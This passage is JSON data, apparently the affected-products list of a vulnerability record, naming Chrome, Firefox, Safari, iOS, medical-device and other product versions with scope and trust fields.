        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.490.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1020"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.469.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1080.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.67"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.951.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.130"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.414.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.52"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.332"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.108"
      },
      {
        "model": "simatic field pg m4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.18"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.688.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1050.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.479.0"
      },
      {
        "model": "pyxis parx handheld",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.960.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "8.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.838.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.394.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.718.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.503.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.890.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.528.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "12.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.25"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1676.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491064"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1023.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.325.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.724.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.4"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.431.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.498.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.51"
      },
      {
        "model": "facscalibur",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.3"
      },
      {
        "model": "facscanto 10-color clinical",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.406.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.938.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.515.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1294.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.36"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.6"
      },
      {
        "model": "viper xtr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.55"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.445.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.409.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.4"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.315.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.119"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.54"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "facsaria i/ii/iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.741.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.27"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.170.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.588.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.59"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "41.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1045.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.799.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1073.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.792.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "24.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.9"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "43.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1667.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.322"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.33"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1279.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.169.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.272.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.97"
      },
      {
        "model": "pyxis medstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "35000"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.411.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.367.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1016"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1045"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.634.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.454.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.79"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.53"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1029.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.6"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.337.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.54"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1032"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1302.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.0"
      },
      {
        "model": "lsrfortessa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.945.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1666.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.895.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.355.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.137"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.5"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.308.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50.0.1"
      },
      {
        "model": "firefox",
